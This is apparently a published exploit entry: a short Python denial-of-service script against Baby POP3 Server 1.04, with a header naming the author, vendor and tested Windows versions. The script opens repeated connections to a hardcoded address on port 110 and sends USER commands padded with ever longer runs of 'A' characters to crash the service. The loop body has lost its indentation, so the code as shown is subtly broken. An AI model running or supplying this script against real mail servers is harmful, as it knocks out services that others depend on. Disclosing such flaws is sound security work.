# Exploit Title: DOS Baby POP3 Server 1.04
# Date: 12/08/2025
# Exploit Author: Érick Sousa (https://www.linkedin.com/in/erickssa)
# Vendor Homepage: https://www.pablosoftwaresolutions.com
# Software Link: https://www.pablosoftwaresolutions.com/html/baby_pop3_server.html
# Version: Baby POP3 Server Version 1.04
# Tested on: Windows XP e Windows 7
# Python 3.13.5 ;)
import socket
jkcode = b"A"
counter = 0
while counter < 10000:
counter += 10
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.18.240", 110))
s.send(b"USER " + jkcode * counter + b"\r\n")
s.close()